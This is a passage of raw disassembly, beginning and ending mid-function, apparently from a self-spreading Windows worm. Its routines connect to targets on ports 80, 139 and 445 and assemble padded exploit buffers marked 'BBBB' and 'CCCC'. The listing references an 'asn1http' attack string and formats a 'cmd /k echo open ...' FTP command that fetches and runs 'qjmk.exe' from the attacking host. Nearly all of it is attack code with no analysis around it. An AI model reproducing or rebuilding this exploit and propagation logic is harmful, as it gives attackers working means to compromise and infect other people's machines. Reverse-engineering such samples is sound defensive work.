mov edi, eax
pop ecx
test edi, edi
jz short loc_401748
push ebx
push 0
push edi
call sub_415CA0
push ebx
push [esp+1Ch+arg_0]
push edi
call sub_415960
add esp, 18h
mov [esi+4], ebx
mov [esi], edi
loc_401748: ; CODE XREF: sub_401716+14�j
mov eax, esi
pop edi
pop esi
pop ebx
retn 8
sub_401716 endp
; ---------------------------------------------------------------------------
db 0Eh dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40175E proc near ; CODE XREF: sub_401352�j
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push ebx
mov ebx, ecx
push esi
mov ecx, [ebp+arg_C]
push edi
lea edi, [eax+ecx]
push edi
call sub_415CF8
mov esi, eax
pop ecx
test esi, esi
jz short loc_4017AA
push edi
push 0
push esi
call sub_415CA0
push [ebp+arg_4]
push [ebp+arg_0]
push esi
call sub_415960
push [ebp+arg_C]
mov eax, [ebp+arg_4]
add eax, esi
push [ebp+arg_8]
push eax
call sub_415960
add esp, 24h
mov [ebx+4], edi
mov [ebx], esi
loc_4017AA: ; CODE XREF: sub_40175E+1C�j
pop edi
mov eax, ebx
pop esi
pop ebx
pop ebp
retn 10h
sub_40175E endp
; ---------------------------------------------------------------------------
db 15h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_4017C8 proc near ; CODE XREF: sub_401159�j
push esi
mov esi, ecx
mov eax, [esi]
test eax, eax
jz short loc_4017D8
push eax
call sub_415D6C
pop ecx
loc_4017D8: ; CODE XREF: sub_4017C8+7�j
and dword ptr [esi+4], 0
and dword ptr [esi], 0
pop esi
retn
sub_4017C8 endp
; ---------------------------------------------------------------------------
db 6 dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_4017E7 proc near ; CODE XREF: sub_40100F�j
push ebx
push esi
mov esi, ecx
push edi
mov eax, [esi+4]
cmp eax, 0FFFFh
jge short loc_401814
xor ebx, ebx
cmp eax, 7Fh
setnl bl
dec ebx
and ebx, 0FFFFFFFEh
add ebx, 3
add eax, ebx
push eax
call sub_415CF8
mov edi, eax
pop ecx
test edi, edi
jnz short loc_401818
loc_401814: ; CODE XREF: sub_4017E7+D�j
xor al, al
jmp short loc_40186F
; ---------------------------------------------------------------------------
loc_401818: ; CODE XREF: sub_4017E7+2B�j
mov eax, ebx
add eax, [esi+4]
push eax
push 0
push edi
call sub_415CA0
add esp, 0Ch
cmp ebx, 1
jnz short loc_40183D
mov al, [esi+4]
mov [edi], al
push dword ptr [esi+4]
lea eax, [edi+1]
push dword ptr [esi]
jmp short loc_401857
; ---------------------------------------------------------------------------
loc_40183D: ; CODE XREF: sub_4017E7+45�j
mov byte ptr [edi], 82h
mov eax, [esi+4]
sar eax, 8
mov [edi+1], al
mov al, [esi+4]
mov [edi+2], al
push dword ptr [esi+4]
lea eax, [edi+3]
push dword ptr [esi]
loc_401857: ; CODE XREF: sub_4017E7+54�j
push eax
call sub_415960
add esp, 0Ch
push dword ptr [esi]
call sub_415D6C
add [esi+4], ebx
pop ecx
mov [esi], edi
mov al, 1
loc_40186F: ; CODE XREF: sub_4017E7+2F�j
pop edi
pop esi
pop ebx
retn
sub_4017E7 endp
; ---------------------------------------------------------------------------
db 23h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401896 proc near ; CODE XREF: sub_401230�j
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
push edi
lea ecx, [ebp+var_8]
push dword ptr [esi+4]
push dword ptr [esi]
push 1
push offset dword_4370B8
call sub_401352
lea ecx, [ebp+var_8]
call sub_40100F
mov eax, [ebp+var_4]
inc eax
push eax
call sub_415CF8
mov edi, eax
pop ecx
test edi, edi
jnz short loc_4018D0
xor al, al
jmp short loc_40190C
; ---------------------------------------------------------------------------
loc_4018D0: ; CODE XREF: sub_401896+34�j
mov eax, [ebp+var_4]
inc eax
push eax
push 0
push edi
call sub_415CA0
mov byte ptr [edi], 3
push [ebp+var_4]
lea eax, [edi+1]
push [ebp+var_8]
push eax
call sub_415960
add esp, 18h
mov ecx, esi
call sub_401159
mov eax, [ebp+var_4]
lea ecx, [ebp+var_8]
inc eax
mov [esi], edi
mov [esi+4], eax
call sub_401159
mov al, 1
loc_40190C: ; CODE XREF: sub_401896+38�j
pop edi
pop esi
leave
retn
sub_401896 endp
; ---------------------------------------------------------------------------
db 1Eh dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40192E proc near ; CODE XREF: sub_401087�j
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
push [ebp+arg_4]
lea ecx, [ebp+var_8]
push [ebp+arg_0]
push dword ptr [esi+4]
push dword ptr [esi]
call sub_401352
mov ecx, esi
call sub_401159
mov eax, [ebp+var_8]
mov [esi], eax
mov eax, [ebp+var_4]
mov [esi+4], eax
mov al, 1
pop esi
leave
retn 8
sub_40192E endp
; ---------------------------------------------------------------------------
db 0Dh dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_40196F proc near ; CODE XREF: sub_401311�j
arg_0 = dword ptr 4
push esi
mov esi, ecx
push [esp+4+arg_0]
call sub_4158E0
pop ecx
push eax
mov ecx, esi
push [esp+8+arg_0]
call sub_401087
pop esi
retn 4
sub_40196F endp
; ---------------------------------------------------------------------------
db 7 dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_401993 proc near ; CODE XREF: sub_4010FA�j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_401087
retn 8
sub_401993 endp
; ---------------------------------------------------------------------------
db 4 dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4019A7 proc near ; CODE XREF: sub_401190�j
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
call sub_40100F
test al, al
jz short loc_4019E0
push dword ptr [esi+4]
lea ecx, [ebp+var_8]
push dword ptr [esi]
push 1
push offset dword_42A16C
call sub_401352
mov ecx, esi
call sub_401159
mov eax, [ebp+var_8]
mov [esi], eax
mov eax, [ebp+var_4]
mov [esi+4], eax
mov al, 1
loc_4019E0: ; CODE XREF: sub_4019A7+F�j
pop esi
leave
retn
sub_4019A7 endp
; ---------------------------------------------------------------------------
db 0Fh dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_4019F2 proc near ; CODE XREF: sub_4012C6�j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_4010FA
test al, al
jz short loc_401A0D
mov ecx, esi
call sub_401190
loc_401A0D: ; CODE XREF: sub_4019F2+12�j
pop esi
retn 8
sub_4019F2 endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401A18 proc near ; CODE XREF: sub_40123F�j
var_858 = byte ptr -858h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 858h
push ebx
push edi
lea ecx, [ebp+var_48]
call sub_401078
mov edi, 408h
cmp [ebp+arg_8], edi
jg loc_401D6C
mov ebx, [ebp+arg_10]
lea eax, [ebx+8]
cmp eax, edi
ja loc_401D6C
push esi
lea ecx, [ebp+var_30]
call sub_401078
lea ecx, [ebp+var_20]
call sub_401078
lea ecx, [ebp+var_50]
call sub_401078
lea ecx, [ebp+var_18]
call sub_401078
lea ecx, [ebp+var_40]
call sub_401078
lea ecx, [ebp+var_38]
call sub_401078
lea ecx, [ebp+var_28]
call sub_401078
push 4
push offset dword_429D5C
lea ecx, [ebp+var_30]
call sub_401087
push 3
push offset dword_429D64
lea ecx, [ebp+var_30]
call sub_401087
lea ecx, [ebp+var_30]
call sub_401230
lea ecx, [ebp+var_30]
call sub_401190
mov esi, 800h
lea eax, [ebp+var_858]
push esi
push 42h
push eax
call sub_415CA0
add esp, 0Ch
lea ecx, [ebp+var_20]
push 8
push offset aRbrbrbrb ; "BBBB"
call sub_401087
push ebx
lea ecx, [ebp+var_20]
push [ebp+arg_C]
call sub_401087
mov eax, 409h
lea ecx, [ebp+var_20]
sub eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_858]
push eax
call sub_401087
lea ecx, [ebp+var_20]
call sub_401230
push offset dword_42A194
lea ecx, [ebp+var_50]
call sub_401311
lea ecx, [ebp+var_50]
call sub_401230
push esi
lea eax, [ebp+var_858]
push 44h
push eax
call sub_415CA0
add esp, 0Ch
lea eax, [ebp+var_858]
lea ecx, [ebp+var_58]
push 410h
push eax
call sub_4011A4
lea ecx, [ebp+var_58]
call sub_401230
push [ebp+var_54]
lea ecx, [ebp+var_50]
push [ebp+var_58]
call sub_4012C6
lea ecx, [ebp+var_58]
call sub_401159
push esi
lea eax, [ebp+var_858]
push 43h
push eax
call sub_415CA0
add esp, 0Ch
push offset aCccc ; "CCCC"
lea ecx, [ebp+var_18]
call sub_401311
push 4
push offset dword_429D68
lea ecx, [ebp+var_18]
call sub_401087
push [ebp+arg_8]
lea ecx, [ebp+var_18]
push [ebp+arg_4]
call sub_401087
sub edi, [ebp+arg_8]
lea eax, [ebp+var_858]
lea ecx, [ebp+var_18]
push edi
push eax
call sub_401087
lea ecx, [ebp+var_18]
call sub_401230
push [ebp+var_14]
lea ecx, [ebp+var_40]
push [ebp+var_18]
call sub_4010FA
push [ebp+var_4C]
lea ecx, [ebp+var_40]
push [ebp+var_50]
call sub_4010FA
lea ecx, [ebp+var_40]
call sub_401190
lea ecx, [ebp+var_18]
call sub_401159
lea ecx, [ebp+var_50]
call sub_401159
push [ebp+var_1C]
lea ecx, [ebp+var_38]
push [ebp+var_20]
call sub_4010FA
push [ebp+var_2C]
lea ecx, [ebp+var_38]
push [ebp+var_30]
call sub_4010FA
push [ebp+var_3C]
lea ecx, [ebp+var_38]
push [ebp+var_40]
call sub_4010FA
lea ecx, [ebp+var_38]
call sub_401190
lea ecx, [ebp+var_20]
call sub_401159
lea ecx, [ebp+var_30]
call sub_401159
lea ecx, [ebp+var_40]
call sub_401159
push esi
lea eax, [ebp+var_858]
push 41h
push eax
call sub_415CA0
add esp, 0Ch
lea eax, [ebp+var_858]
lea ecx, [ebp+var_28]
push 400h
push eax
call sub_401087
lea ecx, [ebp+var_28]
call sub_401230
push 2
push offset dword_42A188
lea ecx, [ebp+var_28]
call sub_401087
push [ebp+var_34]
lea ecx, [ebp+var_28]
push [ebp+var_38]
call sub_4010FA
lea ecx, [ebp+var_28]
call sub_401190
lea ecx, [ebp+var_38]
call sub_401159
lea ecx, [ebp+var_10]
call sub_401078
lea ecx, [ebp+var_8]
call sub_401078
push [ebp+var_24]
lea ecx, [ebp+var_10]
push [ebp+var_28]
call sub_4010FA
lea ecx, [ebp+var_10]
call sub_40100F
lea ecx, [ebp+var_28]
call sub_401159
push offset dword_42A184
lea ecx, [ebp+var_8]
call sub_401311
push [ebp+var_C]
lea ecx, [ebp+var_8]
push [ebp+var_10]
call sub_4010FA
lea ecx, [ebp+var_8]
call sub_40100F
lea ecx, [ebp+var_10]
call sub_401159
push offset dword_42A180
lea ecx, [ebp+var_10]
call sub_401311
push [ebp+var_4]
lea ecx, [ebp+var_10]
push [ebp+var_8]
call sub_4010FA
lea ecx, [ebp+var_10]
call sub_40100F
lea ecx, [ebp+var_8]
call sub_401159
push offset dword_42A174
lea ecx, [ebp+var_8]
call sub_401311
push [ebp+var_C]
lea ecx, [ebp+var_8]
push [ebp+var_10]
call sub_4010FA
lea ecx, [ebp+var_8]
call sub_40100F
lea ecx, [ebp+var_10]
call sub_401159
push offset dword_42A170
lea ecx, [ebp+var_48]
call sub_401311
push [ebp+var_4]
lea ecx, [ebp+var_48]
push [ebp+var_8]
call sub_4010FA
lea ecx, [ebp+var_8]
call sub_401159
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_48]
pop esi
mov [eax], ecx
mov ecx, [ebp+var_44]
mov [eax+4], ecx
jmp short loc_401D7A
; ---------------------------------------------------------------------------
loc_401D6C: ; CODE XREF: sub_401A18+1B�j
; sub_401A18+29�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_48]
mov [eax], ecx
mov ecx, [ebp+var_44]
mov [eax+4], ecx
loc_401D7A: ; CODE XREF: sub_401A18+352�j
pop edi
pop ebx
leave
retn
sub_401A18 endp
; ---------------------------------------------------------------------------
db 0D9h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401E57 proc near ; CODE XREF: sub_401221�j
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
push esi
push edi
mov esi, [ebp+arg_0]
push 1
pop edi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_210]
and [ebp+var_4], 0
push eax
lea eax, [ebp+var_10C]
push 0
push eax
lea eax, [esi+1]
push eax
mov [ebp+var_108], esi
mov [ebp+var_10C], edi
mov [ebp+var_20C], esi
mov [ebp+var_210], edi
mov [ebp+var_8], 0Ah
call ds:dword_495544 ; select
cmp eax, edi
jnz short loc_401EBE
lea eax, [ebp+var_10C]
push eax
push esi
call sub_421070 ; __WSAFDIsSet
test eax, eax
jnz short loc_401EC2
loc_401EBE: ; CODE XREF: sub_401E57+54�j
xor eax, eax
jmp short loc_401ED2
; ---------------------------------------------------------------------------
loc_401EC2: ; CODE XREF: sub_401E57+65�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call dword_491674 ; recv
loc_401ED2: ; CODE XREF: sub_401E57+69�j
pop edi
pop esi
leave
retn
sub_401E57 endp
; ---------------------------------------------------------------------------
db 1Fh dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401EF5 proc near ; CODE XREF: sub_401096�j
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_8]
call dword_491658 ; htonl
mov [ebp+var_4], eax
push 0
lea eax, [ebp+var_4]
push 4
push eax
push [ebp+arg_0]
call dword_4916AC ; send
cmp eax, 4
jz short loc_401F1F
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_401F1F: ; CODE XREF: sub_401EF5+24�j
push 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4916AC ; send
sub eax, [ebp+arg_8]
neg eax
sbb eax, eax
inc eax
leave
retn
sub_401EF5 endp
; ---------------------------------------------------------------------------
db 11h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401F4B proc near ; CODE XREF: sub_40109B�j
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 104h
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
lea ebx, [edi+41h]
push ebx
mov [ebp+var_4], ebx
call sub_415CF8
mov esi, eax
pop ecx
test esi, esi
jnz short loc_401F74
xor al, al
jmp loc_402020
; ---------------------------------------------------------------------------
loc_401F74: ; CODE XREF: sub_401F4B+20�j
push ebx
push 0
push esi
call sub_415CA0
push 2Fh
push offset dword_429DF8
push esi
call sub_415960
push 8
lea eax, [esi+31h]
push offset dword_429E28
push eax
mov [esi+2Fh], di
call sub_415960
push edi
lea ebx, [esi+3Bh]
push [ebp+arg_4]
mov [esi+39h], di
push ebx
call sub_415960
push 6
add ebx, edi
push offset dword_4370AC
push ebx
call sub_415960
mov ebx, [ebp+arg_0]
push 85h
push offset dword_429D70
push ebx
call sub_401096
add esp, 48h
test al, al
jnz short loc_401FDC
loc_401FD8: ; CODE XREF: sub_401F4B+B5�j
xor bl, bl
jmp short loc_402017
; ---------------------------------------------------------------------------
loc_401FDC: ; CODE XREF: sub_401F4B+8B�j
mov edi, 100h
push 0
lea eax, [ebp+var_104]
push edi
push eax
push ebx
call sub_401221
push [ebp+var_4]
push esi
push ebx
call sub_401096
add esp, 1Ch
test al, al
jz short loc_401FD8
push 0
lea eax, [ebp+var_104]
push edi
push eax
push ebx
call sub_401221
add esp, 10h
mov bl, 1
loc_402017: ; CODE XREF: sub_401F4B+8F�j
push esi
call sub_415D6C
pop ecx
mov al, bl
loc_402020: ; CODE XREF: sub_401F4B+24�j
pop edi
pop esi
pop ebx
leave
retn
sub_401F4B endp
; ---------------------------------------------------------------------------
db 36h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40205B proc near ; CODE XREF: sub_40119F�j
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push 0
push 48h
push offset unk_429E34
push [ebp+arg_0]
call ds:dword_495540 ; send
cmp eax, 48h
jnz short loc_402096
push 0
lea eax, [ebp+var_20]
push 20h
push eax
push [ebp+arg_0]
call sub_401221
add esp, 10h
cmp eax, 0FFFFFFFFh
jz short loc_402096
cmp [ebp+var_20], 82h
jz short loc_40209A
loc_402096: ; CODE XREF: sub_40205B+1B�j
; sub_40205B+33�j
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_40209A: ; CODE XREF: sub_40205B+39�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40109B
add esp, 0Ch
leave
retn
sub_40205B endp
; ---------------------------------------------------------------------------
db 14h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4020C1 proc near ; CODE XREF: sub_401244�j
var_10 = qword ptr -10h
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
and dword ptr [ebp+var_8+4], 0
shl eax, 3
mov dword ptr [ebp+var_8], eax
fild [ebp+var_8]
fmul ds:dbl_427078
call sub_415ECC
and dword ptr [ebp+var_8+4], 0
mov dword ptr [ebp+var_8], eax
fild [ebp+var_8]
push ecx
push ecx ; double
fst [ebp+var_8]
fmul ds:dbl_427068
fstp [esp+10h+var_10]
call sub_415D9B
fadd st, st
pop ecx
pop ecx
fadd [ebp+var_8]
call sub_415ECC
inc eax
leave
retn
sub_4020C1 endp
; ---------------------------------------------------------------------------
db 13h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_402120 proc near ; CODE XREF: sub_401334�j
var_40 = qword ptr -40h
mov eax, offset loc_4250A3
call sub_4163B8
sub esp, 2Ch
mov al, [ebp+13h]
push ebx
push esi
push edi
xor edi, edi
lea ecx, [ebp-38h]
push edi
mov [ebp-20h], edi
mov [ebp-38h], al
call sub_401050
push 1
pop ebx
push dword ptr [ebp+10h]
mov [ebp-4], ebx
call sub_401244
cmp [ebp-2Ch], eax
pop ecx
jnb short loc_402162
push edi
push eax
lea ecx, [ebp-38h]
call sub_401348
loc_402162: ; CODE XREF: sub_402120+36�j
cmp [ebp+10h], edi
mov [ebp-18h], edi
jbe loc_40227F
mov ebx, [ebp+10h]
loc_402171: ; CODE XREF: sub_402120+156�j
cmp dword ptr [ebp+10h], 3
jb short loc_40217B
push 3
jmp short loc_40218D
; ---------------------------------------------------------------------------
loc_40217B: ; CODE XREF: sub_402120+55�j
cmp dword ptr [ebp+10h], 2
jnz short loc_402185
push 2
jmp short loc_40218D
; ---------------------------------------------------------------------------
loc_402185: ; CODE XREF: sub_402120+5F�j
cmp dword ptr [ebp+10h], 1
jnz short loc_40218E
push 1
loc_40218D: ; CODE XREF: sub_402120+59�j
; sub_402120+63�j
pop ebx
loc_40218E: ; CODE XREF: sub_402120+69�j
mov [ebp-28h], ebx
mov [ebp-24h], edi
fild qword ptr [ebp-28h]
push ecx
push ecx ; double
fmul ds:dbl_427088
fstp [esp+40h+var_40]
call sub_415EF3
pop ecx
pop ecx
call sub_415ECC
cmp ebx, edi
mov [ebp-1Ch], eax
jbe short loc_4021CD
mov esi, [ebp+0Ch]
mov ecx, ebx
mov edx, ecx
lea edi, [ebp-10h]
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
xor edi, edi
loc_4021CD: ; CODE XREF: sub_402120+93�j
mov cl, [ebp-10h]
mov dl, [ebp-10h]
sar cl, 2
and cl, 3Fh
and dl, 3
mov [ebp-14h], cl
mov cl, [ebp-0Fh]
sar cl, 4
and cl, 0Fh
add [ebp+0Ch], ebx
shl dl, 4
add cl, dl
mov dl, [ebp-0Fh]
mov [ebp-13h], cl
mov cl, [ebp-0Eh]
sar cl, 6
and dl, 0Fh
sub [ebp+10h], ebx
and cl, 3
xor esi, esi
shl dl, 2
add cl, dl
mov [ebp-12h], cl
mov cl, [ebp-0Eh]
and cl, 3Fh
cmp eax, edi
mov [ebp-11h], cl
jbe short loc_40223B
add [ebp-18h], eax
loc_40221F: ; CODE XREF: sub_402120+119�j
movsx eax, byte ptr [ebp+esi-14h]
lea ecx, [ebp-38h]
mov al, byte_429E80[eax]
push eax
push 1
call sub_40130C
inc esi
cmp esi, [ebp-1Ch]
jb short loc_40221F
loc_40223B: ; CODE XREF: sub_402120+FA�j
cmp dword ptr [ebp-18h], 48h
jb short loc_402259
push dword ptr [ebp+14h]
call sub_4158E0
pop ecx
push eax
lea ecx, [ebp-38h]
push dword ptr [ebp+14h]
call sub_401307
mov [ebp-18h], edi
loc_402259: ; CODE XREF: sub_402120+11F�j
push 4
pop esi
cmp [ebp-1Ch], esi
jnb short loc_402273
sub esi, [ebp-1Ch]
loc_402264: ; CODE XREF: sub_402120+151�j
push 3Dh
push 1
lea ecx, [ebp-38h]
call sub_40130C
dec esi
jnz short loc_402264
loc_402273: ; CODE XREF: sub_402120+13F�j
cmp [ebp+10h], edi
ja loc_402171
push 1
pop ebx
loc_40227F: ; CODE XREF: sub_402120+48�j
mov esi, [ebp+8]
mov al, [ebp-38h]
push edi
mov ecx, esi
mov [esi], al
call sub_401050
push ds:dword_427084
lea eax, [ebp-38h]
mov ecx, esi
push edi
push eax
call sub_401258
mov [ebp-20h], ebx
and byte ptr [ebp-4], 0
push ebx
lea ecx, [ebp-38h]
call sub_401050
mov ecx, [ebp-0Ch]
mov eax, esi
pop edi
pop esi
pop ebx
mov large fs:0, ecx
leave
retn
sub_402120 endp
; ---------------------------------------------------------------------------
db 68h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_40232A proc near ; CODE XREF: sub_4012CB�j
mov eax, offset loc_4250C8
call sub_4163B8
sub esp, 10h
push ebx
push esi
push edi
push offset byte_4370BC
lea eax, [ebp-1Ch]
push dword ptr [ebp+10h]
xor ebx, ebx
mov [ebp-4], ebx
push dword ptr [ebp+0Ch]
push eax
call sub_401334
mov eax, [ebp+1Ch]
mov ecx, [ebp-14h]
mov byte ptr [ebp-4], 1
lea esi, [ecx+eax+36h]
push esi
call sub_415CF8
mov edi, eax
add esp, 14h
cmp edi, ebx
jnz short loc_402374
xor bl, bl
jmp short loc_4023B8
; ---------------------------------------------------------------------------
loc_402374: ; CODE XREF: sub_40232A+44�j
mov ecx, [ebp-18h]
mov eax, offset dword_427094
cmp ecx, ebx
jnz short loc_402382
mov ecx, eax
loc_402382: ; CODE XREF: sub_40232A+54�j
cmp [ebp+18h], ebx
jz short loc_40238A
mov eax, [ebp+18h]
loc_40238A: ; CODE XREF: sub_40232A+5B�j
push ecx
push eax
push offset aGetHttp1_0Host ; "GET / HTTP/1.0\r\nHost: %s\r\nAuthorization"...
push esi
push edi
call sub_4163D7
add esp, 14h
push ebx
push esi
push edi
push dword ptr [ebp+8]
call dword_4916AC ; send
cmp eax, esi
jz short loc_4023AF
xor bl, bl
jmp short loc_4023B1
; ---------------------------------------------------------------------------
loc_4023AF: ; CODE XREF: sub_40232A+7F�j
mov bl, 1
loc_4023B1: ; CODE XREF: sub_40232A+83�j
push edi
call sub_415D6C
pop ecx
loc_4023B8: ; CODE XREF: sub_40232A+48�j
and byte ptr [ebp-4], 0
push 1
lea ecx, [ebp-1Ch]
call sub_401050
or dword ptr [ebp-4], 0FFFFFFFFh
push 1
lea ecx, [ebp+14h]
call sub_401050
mov ecx, [ebp-0Ch]
pop edi
mov al, bl
pop esi
pop ebx
mov large fs:0, ecx
leave
retn
sub_40232A endp
; ---------------------------------------------------------------------------
db 2Eh dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402413 proc near ; CODE XREF: sub_4011B8�j
var_624 = byte ptr -624h
var_424 = byte ptr -424h
var_423 = byte ptr -423h
var_395 = byte ptr -395h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_A0 = dword ptr 0A8h
arg_A8 = dword ptr 0B0h
arg_BB = byte ptr 0C3h
push ebp
mov ebp, esp
sub esp, 624h
and [ebp+var_424], 0
push ebx
push esi
push edi
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp+var_423]
push 8Fh
rep stosd
stosw
stosb
lea eax, [ebp+var_424]
push offset dword_42A02C
push eax
call sub_415960
add esp, 0Ch
mov eax, offset aQjmk_exe ; "qjmk.exe"
push eax
push eax
push dword_43DB94
push [ebp+arg_0]
call sub_401299
pop ecx
push eax
push offset aCmdKEchoOpenSD ; "cmd /k echo open %s %d > o&echo user 1 "...
lea eax, [ebp+var_395]
push 400h
push eax
call sub_4163D7
add eax, 90h
push eax
lea eax, [ebp+var_424]
push eax
push 164h
lea eax, [ebp+var_24]
push offset aSvwfbA ; "SVWf"
push eax
call sub_40123F
mov ecx, [eax]
xor esi, esi
mov [ebp+var_8], ecx
add esp, 30h
mov eax, [eax+4]
cmp eax, esi
mov [ebp+var_4], eax
jnz short loc_4024B9
xor eax, eax
jmp loc_40261D
; ---------------------------------------------------------------------------
loc_4024B9: ; CODE XREF: sub_402413+9D�j
mov [ebp+var_C], esi
loc_4024BC: ; CODE XREF: sub_402413+1A9�j
test esi, esi
jnz loc_4025C2
push 6
push 1
push 2
call ds:dword_49553C ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_4025AA
xor eax, eax
lea edi, [ebp+var_1A]
stosd
push [ebp+arg_A0]
stosd
stosd
stosw
mov [ebp+var_1C], 2
call dword_49165C ; htons
mov [ebp+var_1A], ax
lea eax, [ebp+arg_4]
push eax
call dword_49169C ; inet_addr
mov [ebp+var_18], eax
lea eax, [ebp+var_1C]
push 10h
push eax
push ebx
call dword_491604 ; connect
cmp eax, 0FFFFFFFFh
jz loc_40259F
cmp [ebp+arg_A0], 50h
jnz short loc_402567
mov al, [ebp+arg_BB]
sub esp, 10h
mov esi, esp
mov [ebp+var_20], esp
push 0
mov ecx, esi
mov [esi], al
call sub_401050
lea eax, [ebp+arg_4]
push eax
call sub_4158E0
pop ecx
push eax
lea eax, [ebp+arg_4]
push eax
mov ecx, esi
call sub_4010F0
push [ebp+var_4]
push [ebp+var_8]
push ebx
call sub_4012CB
add esp, 1Ch
jmp short loc_40259C
; ---------------------------------------------------------------------------
loc_402567: ; CODE XREF: sub_402413+112�j
cmp [ebp+arg_A0], 8Bh
jnz short loc_402581
push [ebp+var_4]
push [ebp+var_8]
push ebx
call sub_40119F
jmp short loc_402599
; ---------------------------------------------------------------------------
loc_402581: ; CODE XREF: sub_402413+15E�j
cmp [ebp+arg_A0], 1BDh
jnz short loc_40259F
push [ebp+var_4]
push [ebp+var_8]
push ebx
call sub_40109B
loc_402599: ; CODE XREF: sub_402413+16C�j
add esp, 0Ch
loc_40259C: ; CODE XREF: sub_402413+152�j
movzx esi, al
loc_40259F: ; CODE XREF: sub_402413+105�j
; sub_402413+178�j
push ebx
call dword_4916F4 ; closesocket
test esi, esi
jnz short loc_4025B5
loc_4025AA: ; CODE XREF: sub_402413+C2�j
push 3E8h
call ds:dword_495324 ; Sleep
loc_4025B5: ; CODE XREF: sub_402413+195�j
inc [ebp+var_C]
cmp [ebp+var_C], 2
jl loc_4024BC
loc_4025C2: ; CODE XREF: sub_402413+AB�j
lea ecx, [ebp+var_8]
call sub_401159
test esi, esi
jz short loc_40261B
lea eax, [ebp+arg_4]
push eax
mov eax, [ebp+arg_A8]
imul eax, 3Ch
add eax, offset aAsn1http ; "asn1http"
push eax
push offset aSS_ ; "%s// %s."
lea eax, [ebp+var_624]
push 200h
push eax
call sub_4163D7
lea eax, [ebp+var_624]
